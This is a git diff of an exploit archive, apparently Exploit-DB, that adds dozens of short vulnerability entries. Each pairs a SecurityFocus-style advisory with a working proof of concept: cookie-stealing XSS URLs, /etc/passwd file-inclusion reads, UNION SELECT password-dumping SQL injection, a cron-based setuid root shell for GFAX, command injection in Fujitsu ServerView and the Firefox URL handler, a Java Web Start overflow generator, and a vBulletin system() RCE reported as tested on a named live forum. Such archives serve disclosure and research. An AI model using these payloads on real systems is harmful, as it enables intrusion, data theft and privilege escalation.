+http://www.example.com/netflow/jspui/index.jsp?grID=-1&view=g roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20% 68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D% 6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E% 3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F% 70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75% 6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74% 3E%3C%2F%62%6F%64%79%3E&grDisp=1
\ No newline at end of file
diff --git a/platforms/jsp/webapps/30269.txt b/platforms/jsp/webapps/30269.txt
new file mode 100755
index 000000000..ef5fb39e2
--- /dev/null
+++ b/platforms/jsp/webapps/30269.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24766/info
+   
+NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+This issue affects NetFlow Analyzer 5; other versions may also be affected.
+
+ http://www.example.com/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E 
\ No newline at end of file
diff --git a/platforms/jsp/webapps/30270.txt b/platforms/jsp/webapps/30270.txt
new file mode 100755
index 000000000..b1279fb45
--- /dev/null
+++ b/platforms/jsp/webapps/30270.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24766/info
+    
+NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+This issue affects NetFlow Analyzer 5; other versions may also be affected.
+
+http://www.example.com/netflow/jspui/customReport.jsp?rtype=gl obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68% 72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62 %6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2 0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62% 72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73 %63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2 E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F% 64%79%3E&period=hourly&customOption=true&firstTime=true 
\ No newline at end of file
diff --git a/platforms/linux/dos/30251.c b/platforms/linux/dos/30251.c
new file mode 100755
index 000000000..94e824b5f
--- /dev/null
+++ b/platforms/linux/dos/30251.c
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/24651/info
+
+The GD graphics library is prone to multiple vulnerabilities.
+
+An attacker can exploit this issue to cause denial-of-service conditions or execute arbitrary code in the context of applications implementing the affected library.
+
+Version prior to GD graphics library 2.0.35 are reported vulnerable. 
+
+#include "gd.h"
+
+int main() {
+    FILE *fp = fopen("./x.xbm", "w+");
+
+    fprintf(fp, "#define width 255\n#define height 1073741824\nstatic unsigned char bla = {\n");
+
+    fseek(fp, 0, SEEK_SET);
+
+    gdImageCreateFromXbm(fp);
+
+}
diff --git a/platforms/linux/local/30280.txt b/platforms/linux/local/30280.txt
new file mode 100755
index 000000000..8e4e2d091
--- /dev/null
+++ b/platforms/linux/local/30280.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24780/info
+
+GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers.
+
+GFAX 0.7.6 is vulnerable; other versions may also be affected. 
+
+while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done 
\ No newline at end of file
diff --git a/platforms/linux/remote/30284.vbs b/platforms/linux/remote/30284.vbs
new file mode 100755
index 000000000..ba14effff
--- /dev/null
+++ b/platforms/linux/remote/30284.vbs
@@ -0,0 +1,139 @@
+source: http://www.securityfocus.com/bid/24832/info
+
+Sun Java Runtime Environment is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
+
+An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
+
+This issue affects these versions:
+
+Java Runtime Environment 6 update 1
+Java Runtime Environment 5 update 11
+
+Prior versions are also affected. 
+
+'-----------------------------------------------------------------------------------------------
+' Java Web Start Buffer Overflow POC Exploit
+'
+' FileName: JavaWebStartPOC.VBS
+' Contact: ZhenHan.Liu#ph4nt0m.org
+' Date: 2007-07-10
+' Team: http://www.ph4nt0m.org
+' Enviroment: Tested on JRE 1.6, javaws.exe v6.0.10.6
+' Reference: http://seclists.org/fulldisclosure/2007/Jul/0155.html
+' Usage: I did not put a real alpha shellcode here, you'd replace it with your own.
+' 
+' Code(javaws.exe):
+' .text:00406208 ; *************** S U B R O U T I N E ***************************************
+' .text:00406208
+' .text:00406208 ; Attributes: bp-based frame
+' .text:00406208
+' .text:00406208 sub_406208      proc near               ; CODE XREF: sub_405468+4E p
+' .text:00406208
+' .text:00406208 FileName        = byte ptr -540h
+' .text:00406208 FindFileData    = _WIN32_FIND_DATAA ptr -140h
+' .text:00406208 arg_0           = dword ptr  8
+' .text:00406208 arg_4           = dword ptr  0Ch
+' .text:00406208
+' .text:00406208                 push    ebp             ; FileName 1k Buffer
+' .text:00406209                 mov     ebp, esp
+' .text:0040620B                 sub     esp, 540h
+' .text:00406211                 push    5Fh
+' .text:00406213                 push    2Fh
+' .text:00406215                 push    [ebp+arg_0]
+' .text:00406218                 call    sub_40544D
+' .text:00406218
+' .text:0040621D                 push    5Fh
+' .text:0040621F                 push    3Ah
+' .text:00406221                 push    [ebp+arg_0]
+' .text:00406224                 call    sub_40544D
+' .text:00406224
+' .text:00406229                 add     esp, 18h
+' .text:0040622C                 push    2Ah
+' .text:0040622E                 push    [ebp+arg_0]     ; codebase buffer
+' .text:00406231                 push    5Ch
+' .text:00406233                 push    offset s_Si     ; "si"
+' .text:00406238                 push    5Ch
+' .text:0040623A                 push    offset s_Tmp_0  ; "tmp"
+' .text:0040623F                 push    5Ch
+' .text:00406241                 call    sub_40615B
+' .text:00406241
+' .text:00406246                 push    eax
+' .text:00406247                 lea     eax, [ebp+FileName]
+' .text:0040624D                 push    offset s_SCSCSCSC ; "%s%c%s%c%s%c%s%c"
+' .text:00406252                 push    eax             ; char *
+' .text:00406253                 call    _sprintf        ; sprintf copy codebase to 1k stack buffer lead to buffer over flow
+' .text:00406253
+' .text:00406258                 add     esp, 28h
+' .text:0040625B                 lea     eax, [ebp+FindFileData]
+' .text:00406261                 push    eax             ; lpFindFileData
+' .text:00406262                 lea     eax, [ebp+FileName]
+' .text:00406268                 push    eax             ; lpFileName
+' .text:00406269                 call    ds:FindFirstFileA
+' .text:0040626F                 cmp     eax, 0FFFFFFFFh
+' .text:00406272                 jnz     short loc_406278
+' .text:00406272
+' .text:00406274                 xor     eax, eax
+' .text:00406276                 leave
+' .text:00406277                 retn
+' .text:00406277
+' .text:00406278 ; ---------------------------------------------------------------------------
+' .text:00406278
+' .text:00406278 loc_406278:                             ; CODE XREF: sub_406208+6A j
+' .text:00406278                 push    esi
+' .text:00406279                 mov     esi, [ebp+arg_4]
+' .text:0040627C                 lea     ecx, [ebp+FindFileData' .cFileName]
+' .text:00406282                 mov     edx, ecx
+' .text:00406284                 sub     esi, edx
+' .text:00406284
+' .text:00406286
+' .text:00406286 loc_406286:                             ; CODE XREF: sub_406208+86 j
+' .text:00406286                 mov     dl, [ecx]
+' .text:00406288                 mov     [esi+ecx], dl
+' .text:0040628B                 inc     ecx
+' .text:0040628C                 test    dl, dl
+' .text:0040628E                 jnz     short loc_406286
+' .text:0040628E
+' .text:00406290                 push    eax             ; hFindFile
+' .text:00406291                 call    ds:FindClose
+' .text:00406297                 xor     eax, eax
+' .text:00406299                 inc     eax
+' .text:0040629A                 pop     esi
+' .text:0040629B                 leave
+' .text:0040629C                 retn
+' .text:0040629C
+' .text:0040629C sub_406208      endp
+'-----------------------------------------------------------------------------------------------
+
+If WScript.Arguments.Count <> 1 Then
+	WScript.Echo WScript.ScriptName & " <FileName>"
+	WScript.Quit
+End If
+
+sFileName = WScript.Arguments(0)
+
+On Error Resume Next
+
+Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
+Set oFS = oFSO.CreateTextFile(sFileName)
+
+If Err.Number <> 0 Then
+	WScript.Echo "Error: Failed Create File."
+	WScript.Quit
+End If
+
+c = Chr(&H04)
+alphaShellcode = "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII"
+
+oFS.WriteLine "<?xml version=""1.0"" encoding=""utf-8""?>"
+oFS.WriteLine "<jnlp spec=""1.0+"" codebase=""http://" & String(12000000, c) & alphaShellcode & String(24, c) & """ href=""test.jnlp"">"
+oFS.WriteLine "</jnlp>"
+
+If Err.Number <> 0 Then
+	WScript.Echo "Error: Failed Write File."
+	Err.Clear
+End If
+
+oFS.Close
+
+Set oFS = Nothing
+Set oFSO = Nothing
diff --git a/platforms/linux/remote/30285.txt b/platforms/linux/remote/30285.txt
new file mode 100755
index 000000000..bada251fb
--- /dev/null
+++ b/platforms/linux/remote/30285.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24837/info
+
+Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers.
+
+Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through the 'firefox.exe' and 'navigator.exe' processes by employing the 'firefoxurl' and 'navigatorurl' handlers.
+
+An attacker can also employ these issues to carry out cross-browser scripting attacks by using the '-chrome' argument. This can allow the attacker to run JavaScript code with the privileges of trusted Chrome context and gain full access to Firefox and Netscape Navigator's resources.
+
+Exploiting these issues would permit remote attackers to influence command options that can be called through the 'firefoxurl' and 'navigatorurl' handlers and therefore execute commands and script code with the privileges of a user running the applications. Successful attacks may result in a variety of consequences, including remote unauthorized access. 
+
+navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
\ No newline at end of file
diff --git a/platforms/linux/remote/30286.txt b/platforms/linux/remote/30286.txt
new file mode 100755
index 000000000..dd7c6c2aa
--- /dev/null
+++ b/platforms/linux/remote/30286.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24853/info
+
+ImgSvr is prone to a local file-include vulnerability because it fails to sanitize user-supplied input.
+
+Attackers may exploit this issue to access files that may contain sensitive information.
+
+UPDATE (December 24, 2007): According to the vendor, this issue was addressed in ImgSvr 0.6.21. However, reports indicate that this version is still vulnerable.
+
+GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30218.txt b/platforms/multiple/remote/30218.txt
new file mode 100755
index 000000000..55a1c79fd
--- /dev/null
+++ b/platforms/multiple/remote/30218.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24566/info
+
+BugHunter HTTP Server is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to gain access to sensitive information. Information obtained may lead to further attacks.
+
+This issue affects HTTP Server 1.6.2; other versions may also be affected. 
+
+http://www.example.com/test.htm%20 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30219.txt b/platforms/multiple/remote/30219.txt
new file mode 100755
index 000000000..1eb23f9b5
--- /dev/null
+++ b/platforms/multiple/remote/30219.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24571/info
+
+MyServer is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to access sensitive information that may lead to further attacks.
+
+This issue affects MyServer 0.8.9; other versions may also be affected.
+
+http://www.example.com/cgi-bin/post.mscgI (Note: Capital 'I' at the end of the URI) 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30222.txt b/platforms/multiple/remote/30222.txt
new file mode 100755
index 000000000..c3d4751e7
--- /dev/null
+++ b/platforms/multiple/remote/30222.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24583/info
+
+MyServer is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MyServer 0.8.9 is vulnerable; other versions may also be affected. 
+
+http://localhost/cgi-bin/post.mscgi Post:<script>alert('xss');</script> 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30229.txt b/platforms/multiple/remote/30229.txt
new file mode 100755
index 000000000..e34848642
--- /dev/null
+++ b/platforms/multiple/remote/30229.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24618/info
+
+SHTTPD is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to access sensitive information that may lead to further attacks.
+
+This issue affects SHTTPD 1.38; other versions may also be affected.
+
+http://www.example.com/test.php%20 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30231.txt b/platforms/multiple/remote/30231.txt
new file mode 100755
index 000000000..0f37d7835
--- /dev/null
+++ b/platforms/multiple/remote/30231.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24623/info
+
+Key Focus Web Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects Key Focus Web Server 3.1.0; other versions may also be affected. 
+
+http://www.example.com:9727/index.wkf?opmenu=0&opsubmenu=aaaa%22%3E%3Cscript%3Ealert('xss');%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30256.txt b/platforms/multiple/remote/30256.txt
new file mode 100755
index 000000000..4bc616379
--- /dev/null
+++ b/platforms/multiple/remote/30256.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24697/info
+
+Oracle Rapid Install Web Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to inject HTML and script code into the browser of an unsuspecting victim. The attacker may then steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com:8004/pls/MSBEP004/<script>alert("XSS")</script>
+
+http://www.example.com:8004/pls/<script>alert("XSS")</script> 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30264.txt b/platforms/multiple/remote/30264.txt
new file mode 100755
index 000000000..a43d282ed
--- /dev/null
+++ b/platforms/multiple/remote/30264.txt
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/24762/info
+
+Fujitsu ServerView is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. Successful attacks will compromise the application and underlying webserver; other attacks are also possible.
+
+Versions prior to Fujitsu ServerView 4.50.09 are vulnerable. 
+
+http://www.example.com/cgi-bin/ServerView/
+SnmpView/DBAsciiAccess
+?SSL=
+&Application=ServerView/SnmpView
+&Submit=Submit
+&UserID=1
+&Profile=
+&DBAccess=ASCII
+&Viewing=-1
+&Action=Show
+&ThisApplication=TestConnectivityFrame
+&DBElement=ServerName
+&DBValue=bcmes
+&DBList=snism
+&UserValue=
+&DBTableList=SERVER_LIST
+&Sorting=
+&ParameterList=What--primary,,
+OtherCommunity--public,,
+SecondIP--,,
+Timeout--5,,
+Community--public,,
+ServerName--bcmes,,
+Servername--127.0.0.1;id;,, # vulnerable parameter
+SType--Server 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30265.txt b/platforms/multiple/remote/30265.txt
new file mode 100755
index 000000000..843cb12fb
--- /dev/null
+++ b/platforms/multiple/remote/30265.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/24765/info
+
+SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
+
+Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application. 
+
+GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
+Accept: */*
+Accept-Language: en-us
+Pragma: no-cache
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
+CLR 1.1.4322; .NET CLR 2.0.50727)
+Host: sapserver:8100
+Proxy-Connection: Keep-Alive 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30279.txt b/platforms/multiple/remote/30279.txt
new file mode 100755
index 000000000..42d26c9b2
--- /dev/null
+++ b/platforms/multiple/remote/30279.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24775/info
+
+SAP Internet Graphics Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/ADM:GETLOGFILE?PARAMS=<script>alert("hello")</script> 
\ No newline at end of file
diff --git a/platforms/multiple/remote/30288.txt b/platforms/multiple/remote/30288.txt
new file mode 100755
index 000000000..1e3f613ff
--- /dev/null
+++ b/platforms/multiple/remote/30288.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/24856/info
+
+Adobe Flash Player is prone to a remote code-execution vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file.
+
+A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the victim running the vulnerable application.
+
+Adobe Flash Player 9.0.45.0 and earlier, 8.0.34.0 and earlier, and 7.0.69.0 and earlier are affected. 
+
+http://www.exploit-db.com/sploits/30288.zip
diff --git a/platforms/osx/remote/30228.txt b/platforms/osx/remote/30228.txt
new file mode 100755
index 000000000..fdb7685b0
--- /dev/null
+++ b/platforms/osx/remote/30228.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/24598/info
+
+Apple WebCore is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may exploit this issue by enticing victims into visiting a malicious website.
+
+The attacker may leverage this issue to execute arbitrary script code in an application using the affected framework (typically Safari). This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+xmlhttp.setRequestHeader('Foo', 'baa\nHost: test\n');
+
+The above request is treated as valid and results in:
+
+GET / HTTP/1.1
+Accept-Encoding: gzip, deflate
+Accept-Language: en
+Foo: baa
+Host: test 
\ No newline at end of file
diff --git a/platforms/php/webapps/30180.txt b/platforms/php/webapps/30180.txt
index 2cac12052..eb184e1b7 100755
--- a/platforms/php/webapps/30180.txt
+++ b/platforms/php/webapps/30180.txt
@@ -1,10 +1,31 @@
 # Exploit Title:vBulletin 5.?.x Remote Code Execution
-# Date: 09/12/13
+# Date: 11/12/13
 # Exploit Author: @sergioyoshiman (Sergio Yoshikata)
 # Vendor Homepage:https://www.*vbulletin*.com/
 # Versions affected : 2012
 
-Injector team was selling this exploit for 700 $ a complete shit and
-only 10 % are vulnerable.
-The exploit
-search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query=%24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthreadid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
+Injector team was selling this exploit for 700 $ a complete shit and only
+10 % are vulnerable.
+Simple to find.
+The poc
+search.php?ajax=0&beforeafter=after&childforums=1&
+exactname=1&exclude=&forumchoice=&nocache=0&query=
+%24%7b%40system('pwd')%7d&quicksearch=0&replyless=
+0&replylimit=0&saveprefs=1&searchdate=0&searchthre
+adid=0&searchtype=1&searchuser=1&showposts=0&sortb
+y=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
+
+The vulnerable $_GET parameter is query.
+You should need to create a user and use it like this
+
+php code to inject : ${@system('put command here')}
+
+Example:
+Tested on : forums.5series.net/search.php?ajax=0&beforeafter=after&childforums=1&
+exactname=1&exclude=&forumchoice=&nocache=0&query=
+%24%7b%40system('pwd')%7d&quicksearch=0&replyless=
+0&replylimit=0&saveprefs=1&searchdate=0&searchthre
+adid=0&searchtype=1&searchuser=1&showposts=0&sortb
+y=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
+
+Greetz ,Ohh a 16 year old guys pwned 1337day ?
diff --git a/platforms/php/webapps/30214.txt b/platforms/php/webapps/30214.txt
deleted file mode 100755
index b20b2c3b1..000000000
--- a/platforms/php/webapps/30214.txt
+++ /dev/null
@@ -1,31 +0,0 @@
-###############################################################
-# Exploit Title: Wordpress Skinizer theme Remote File Upload Vulnerability
-# Author: Ashiyane Digital Security Team
-# Date: 12/11/2013
-# Vendor Homepage: http://themeforest.net
-# Software Link: http://prefiles.com/9dgxv5102nkp/Skinizer.WordPress.v1.0.4.rar
-# Google dork: Use your brain :)
-# Tested on: Windows/Linux
-###############################################################
-
-1) Exploit :
-= = = = = =
-
-<?php
-$uploadfile="file.php";
-$ch = curl_init("
-http://127.0.0.1/wp-content/themes/skinizer/framework/_scripts/valums_uploader/php.php
-");
-curl_setopt($ch, CURLOPT_POST, true);
-curl_setopt($ch, CURLOPT_POSTFIELDS,
-array('FileDATA'=>"@$uploadfile")); curl_setopt($ch,
-CURLOPT_RETURNTRANSFER, 1);
-$postResult = curl_exec($ch);
-curl_close($ch); print "$postResult";
-?>
-# http://[Target]/wp-content/uploads/2013/12/file.php
-
-# #### #### #### #### #### #### #### #### #
-# BY T3rm!nat0r5
-# E-mail : poya.terminator@gmail.com
-# #### #### #### #### #### #### #### #### #
diff --git a/platforms/php/webapps/30217.txt b/platforms/php/webapps/30217.txt
new file mode 100755
index 000000000..5ccd70884
--- /dev/null
+++ b/platforms/php/webapps/30217.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24565/info
+
+Wrapper.php for OsCommerce is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts. 
+
+http://www.example.com/wrapper.php?file=../../../../etc/passwd 
\ No newline at end of file
diff --git a/platforms/php/webapps/30220.txt b/platforms/php/webapps/30220.txt
new file mode 100755
index 000000000..d38390e47
--- /dev/null
+++ b/platforms/php/webapps/30220.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24572/info
+
+PHP Accounts is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
+
+PHP Accounts 0.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?page=../../etc/passwd 
\ No newline at end of file
diff --git a/platforms/php/webapps/30221.txt b/platforms/php/webapps/30221.txt
new file mode 100755
index 000000000..12a8e677b
--- /dev/null
+++ b/platforms/php/webapps/30221.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/24574/info
+
+PHP Accounts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Accounts 0.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/index.php?Outgoing_Type_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Outgoing_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Project_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Client_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Invoice_ID=[SQL INJECTION]
+http://www.example.com/path/index.php?Vendor_ID=[SQL INJECTION] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30223.txt b/platforms/php/webapps/30223.txt
new file mode 100755
index 000000000..e11d1045d
--- /dev/null
+++ b/platforms/php/webapps/30223.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/24584/info
+
+NetClassifieds is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues and cross-site scripting issues.
+
+A successful exploit may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+NetClassifieds Free, Standard, Professional, and Premium editions are reported vulnerable. 
+
+http://www.example.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/*
+http://www.example.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/30225.txt b/platforms/php/webapps/30225.txt
new file mode 100755
index 000000000..d6974b5a5
--- /dev/null
+++ b/platforms/php/webapps/30225.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/24590/info
+
+eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database.
+
+eNdonesia 8.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,pwd,3+from+authors/*
+http://www.example.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,LOAD_FILE(0x2F6574632F706173737764),3+from+authors/*
+http://www.example.com/mod.php?mod=diskusi&op=viewdisk&did=-9+union+select+1,2,aid,pwd,5,6,email+from+authors/*
+http://www.example.com/mod.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/*
+http://www.example.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
+
+
diff --git a/platforms/php/webapps/30226.txt b/platforms/php/webapps/30226.txt
new file mode 100755
index 000000000..46faa8c81
--- /dev/null
+++ b/platforms/php/webapps/30226.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24590/info
+ 
+eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database.
+ 
+eNdonesia 8.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/banners.php?op=click&bid=-9+union+select+pwd+from+authors/*
\ No newline at end of file
diff --git a/platforms/php/webapps/30227.txt b/platforms/php/webapps/30227.txt
new file mode 100755
index 000000000..32d5f71c8
--- /dev/null
+++ b/platforms/php/webapps/30227.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24591/info
+
+The 'mod_forum' component for Joomla and Mambo is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to access the underlying system.
+
+http://www.example.com/components/com_forum/download.php?phpbb_root_path=[Shell] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30230.txt b/platforms/php/webapps/30230.txt
new file mode 100755
index 000000000..402f02e75
--- /dev/null
+++ b/platforms/php/webapps/30230.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24621/info
+
+MyNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+This issue affects MyNews 0.10; other versions may also be vulnerable. 
+
+To exploit this issue, modify the following cookie variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin" 
\ No newline at end of file
diff --git a/platforms/php/webapps/30232.txt b/platforms/php/webapps/30232.txt
new file mode 100755
index 000000000..740707604
--- /dev/null
+++ b/platforms/php/webapps/30232.txt
